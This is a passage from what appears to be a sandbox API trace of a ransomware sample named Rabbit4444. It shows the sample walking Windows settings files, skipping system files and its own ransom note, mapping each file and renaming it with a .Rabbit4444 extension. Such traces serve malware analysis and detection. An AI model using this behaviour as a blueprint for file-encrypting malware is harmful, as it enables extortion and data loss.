lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2=".") returned 1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="..") returned 1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="windows") returned -1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="boot") returned 1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.180] lstrcmpiW (lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.180] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms" | out: lpString1="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms") returned="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms" [0058.180] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.181] lstrlenW (lpString="Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms") returned 64 [0058.181] lstrlenW (lpString="Rabbit4444") returned 10 [0058.181] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.181] lstrlenW (lpString=".dll") returned 4 [0058.181] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.181] lstrlenW (lpString=".lnk") returned 4 [0058.181] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.181] lstrlenW (lpString=".ini") returned 4 [0058.181] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.181] lstrlenW (lpString=".sys") returned 4 [0058.181] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0042ae00-17cc-42ec-b5ad-b8f08a025d71}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.182] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.182] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14949238773) returned 1 [0058.182] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1006) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.182] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0058.183] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0058.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.184] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14949484800) returned 1 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.184] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.184] CloseHandle (hObject=0x298) returned 1 [0058.184] CloseHandle (hObject=0x278) returned 1 [0058.184] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms.Rabbit4444") returned 192 [0058.184] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0042ae00-17cc-42ec-b5ad-b8f08a025d71}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0042ae00-17cc-42ec-b5ad-b8f08a025d71}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.186] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3ebad2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f3ebad2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", cAlternateFileName="CLASSI~2.SET")) returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2=".") returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="..") returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="windows") returned -1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="boot") returned 1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.186] lstrcmpiW (lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.186] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms" | out: lpString1="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms") returned="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms" [0058.186] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.187] lstrlenW (lpString="Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms") returned 64 [0058.187] lstrlenW (lpString="Rabbit4444") returned 10 [0058.187] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.187] lstrlenW (lpString=".dll") returned 4 [0058.187] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.187] lstrlenW (lpString=".lnk") returned 4 [0058.187] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.187] lstrlenW (lpString=".ini") returned 4 [0058.187] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.187] lstrlenW (lpString=".sys") returned 4 [0058.187] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{01acc6bc-9a3d-49c5-ac7d-0fb9e026c424}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.187] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.187] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14949801419) returned 1 [0058.187] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1202) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.187] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.189] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.189] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.189] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.189] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.189] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.190] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14950061995) returned 1 [0058.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.190] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.190] CloseHandle (hObject=0x298) returned 1 [0058.190] CloseHandle (hObject=0x278) returned 1 [0058.190] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms.Rabbit4444") returned 192 [0058.190] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{01acc6bc-9a3d-49c5-ac7d-0fb9e026c424}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{01acc6bc-9a3d-49c5-ac7d-0fb9e026c424}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.191] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f542ffb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f542ffb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", cAlternateFileName="CLASSI~3.SET")) returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2=".") returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="..") returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="windows") returned -1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="boot") returned 1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.191] lstrcmpiW (lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.191] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms" | out: lpString1="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms") returned="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms" [0058.191] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.192] lstrlenW (lpString="Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms") returned 64 [0058.192] lstrlenW (lpString="Rabbit4444") returned 10 [0058.192] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.192] lstrlenW (lpString=".dll") returned 4 [0058.192] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.192] lstrlenW (lpString=".lnk") returned 4 [0058.192] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.192] lstrlenW (lpString=".ini") returned 4 [0058.192] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.192] lstrlenW (lpString=".sys") returned 4 [0058.192] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.192] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{028de9f5-65f3-4a06-a048-421056f3e421}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.192] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.192] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14950295646) returned 1 [0058.192] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1181) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.192] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0058.193] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0058.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.195] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14950551994) returned 1 [0058.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.195] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.195] CloseHandle (hObject=0x298) returned 1 [0058.195] CloseHandle (hObject=0x278) returned 1 [0058.195] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms.Rabbit4444") returned 192 [0058.195] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{028de9f5-65f3-4a06-a048-421056f3e421}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{028de9f5-65f3-4a06-a048-421056f3e421}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.196] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd9b513, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3fd9b513, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", cAlternateFileName="CLASSI~4.SET")) returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2=".") returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="..") returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="windows") returned -1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="boot") returned 1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.196] lstrcmpiW (lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.196] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms" | out: lpString1="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms") returned="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms" [0058.196] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.197] lstrlenW (lpString="Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms") returned 64 [0058.197] lstrlenW (lpString="Rabbit4444") returned 10 [0058.197] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.197] lstrlenW (lpString=".dll") returned 4 [0058.197] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.197] lstrlenW (lpString=".lnk") returned 4 [0058.197] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.197] lstrlenW (lpString=".ini") returned 4 [0058.197] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.197] lstrlenW (lpString=".sys") returned 4 [0058.197] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.197] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{030c20f0-e20b-417a-b7ad-cec6ee955cd3}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.197] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.197] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14950789820) returned 1 [0058.197] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1045) returned 1 [0058.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, 